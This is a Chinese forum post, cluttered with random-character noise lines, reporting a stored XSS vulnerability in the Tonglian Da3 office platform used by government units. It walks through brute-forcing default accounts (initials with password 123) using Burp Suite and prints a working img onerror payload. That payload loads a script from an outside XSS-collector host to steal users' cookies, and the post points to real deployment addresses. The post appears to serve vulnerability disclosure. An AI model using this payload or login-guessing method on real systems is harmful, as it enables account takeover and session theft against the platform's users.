* V m Q& c, t
) y* ~) I2 \/ J% @% R 同联Da3协同办公平台后台通用储存型xss漏洞
$ x s" I5 @) W+ ?- a( H) K+ n
# i/ k i6 D# w/ t
" m+ `6 o+ ~7 ], l z 平台简介:4 w& I5 ]7 D' \$ M4 x4 W! a1 ]
$ N. ^5 O o, d) `6 T7 n3 u! H: p
- @) j) t2 s1 r+ f
3 j8 L7 H- l9 O# g
3 n. D$ v& |& t4 o% C
0 `7 i+ k9 a3 G+ r I& t
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' @& A3 i. j. q6 U9 u: Y
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) i X. k1 d* z4 t: N
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!" M4 a1 w) A I9 B
# d, ]; H Q8 N% i& }
( z" U/ O# [; A+ N5 L 9 L2 Z- r/ V. [4 P
2 X2 `) z) `$ c' ]
. |2 f( E% @6 Y; L( Y2 k: Q! E, w4 z 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
7 L2 T6 N! |/ D, m i. ~- n
* f4 s0 m& S$ p
8 S8 a* y- {7 c2 Y" P3 M
, B7 v) k3 b2 K4 c* }, Z
; }) L3 m0 T( o; n) O
( o! d2 Q& n/ r, u7 t http://1.1.1.1:7197/cap-aco/#(案例2-)* w8 z( E2 c A! E
+ _- B0 I! _. V; Z3 g8 v
2 n+ |" X+ a1 i l3 H! V http://www.XXOO.com (案例1-官网网站) q: m; f, F. p, F( _$ T
T" d1 H/ M" D# A: g# [
$ L5 @: \+ L2 b
漏洞详情:2 n9 y" b# H: L0 E8 N7 m9 w
1 S- f$ P" R2 i C7 x- n) ` & w* e" m6 b6 U: d: E
案例一、
, i" J3 v' V/ H. S$ u. Q4 Q
3 @8 w5 Y+ R$ a# n, ~ ' V' G1 I. U) Q+ ? K3 }& i
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试) C' M& _- X* J- r, w% a( I
, `9 B' y3 j' ^, S) a' d
2 p* [( J" ~2 M3 |; ] ? 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
7 E% C5 g1 e9 t: B
( `7 s! p4 d3 A+ j7 ?# ` 7 k- k5 W' y J% R9 ^7 W9 R
; L W) U5 h7 z9 R6 U; U
0 z4 a6 V) J+ y
6 c+ ~; x" [& K/ b: w7 B% s# r 
& C9 o" P0 C2 o1 E: ]8 J8 T. k
i2 q: Q; |4 m$ C; U) a! c 1 [' C( S7 y8 W# ?* G, G
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
3 S/ m4 f D6 F! D0 k
! f( a( U8 m( J& [
& Q0 ]' N: @( P4 C, W. a6 J& G! k
6 f( U" N! \( C4 m
4 N5 ]9 x. b) ]1 g3 [ `* [
: \ |3 o6 l, r9 X V0 I 
4 k6 V' G$ q. j3 q' s0 O1 [
* p1 p, n8 I% ^3 ~
. | s; B5 C! i' ^6 {2 Z
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
* a# B5 _- c) Y, t% q) Q
8 d+ Y: B, A4 i& z1 }- O
/ x2 |: Y- p" _% O- }* x0 Q* i
/ C) B6 `# q3 T
) [# w1 X# w, D
' q. b, \7 |! w F0 K( S, \( C8 P <img src=x
. E7 `$ `& a, `' n0 {8 Konerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 3 P7 r& L" g" Y& _) z1 {# z1 I) @
- \9 }4 g9 R( }7 j3 T) v$ _7 j
! ?0 _* a, C+ @7 C
1 N6 ^& l" F: E
# |* d( C8 x4 R& s. D% n I
' E4 e5 p3 f; t# Y$ o. e 然后发送,接收cookie如图:
& h) } P' w3 L8 e
8 j" Q+ R2 h: n) P# p- O% {
. }1 y6 | j2 A- D+ M* X e
% D; x0 u6 s8 o' o6 j& ~( R
6 r6 q+ u& x. \6 h5 S2 W' @9 s 7 i! @! B7 K E1 ?0 n
% F+ A* h [& O3 B. A; F" z
) I8 B% i6 p- W3 m% r
9 [. |7 X9 u) O+ T# J
4 }$ K6 L& R0 M9 G
; G/ f! b3 ~/ V0 J/ R. ~
0 X! e- i) x0 z8 g
3 D, [1 x s* B
/ x, h1 y' I! }6 r6 B
9 n3 M( {& g P/ @ 
, z& w" m5 `* N5 ^! f" @
/ q& x3 S n9 Z, |" ~) u' I
+ A/ M# P# y6 c. h8 C 
# i1 U0 ~( L$ [3 P0 F0 ~
2 r6 f' N% r7 _ . b$ L! X$ B2 S+ y% t% ?. |9 v% V
2 L a' }" J+ D, h
+ l9 p. f" m5 m4 O4 ]6 H1 O7 _
' Y. e; n' o7 t H 案例2、
( v1 R! B& ~. U I# K
7 N q% z( b) C8 \
/ U! Y! [: F$ W; G/ l: A 前面步骤都一样,下面看效果图: # z9 @6 J& i+ I: V
* M: f7 P4 t4 p# G$ n
( `2 t6 z9 y% G6 I' B+ S6 ~ 
5 G' l7 q# K- c9 P5 C
6 T* h* H1 a* a1 P5 y. f% ` b
) C3 u/ R; [* R6 s 
8 |9 _& |. G( s. r' \) e2 _
) Z1 V/ }0 J- o7 t% [) Y
* [2 {! ^$ d D- T; ]/ D2 _- j
( q C; _. u, d: ?8 T
3 M. A1 a5 {! ?
! A0 w8 i- _) I6 Q
! `6 ]8 i( f! ]( Z: L
8 V/ N% r8 V8 d# Q& S
: C# i/ i+ X( o 
9 [+ ~; I! W. ~
1 [' Y1 ?- \2 ^0 `" j: O, t
3 s7 x8 R+ Z @: j {! P' `( q6 Y. o
$ L) `, o* p7 N Y% \+ R+ r3 s
2 y! r6 s" n! F & v1 v( t/ P }1 l* R6 i
; O/ ^7 _/ F# J& W: m4 N/ u
0 Y! p. P/ x+ H4 x7 j% `5 S
; Q- t. c R! @, M( g
/ t: Y" O2 H. l$ R6 v7 o {: V# V
! W8 G. L4 ^7 R* `" y/ e
, I+ x6 C& J8 k1 U
' b5 W# X Q/ a$ p6 F
发表于 2018-10-20 20:14:15
收藏
支持
反对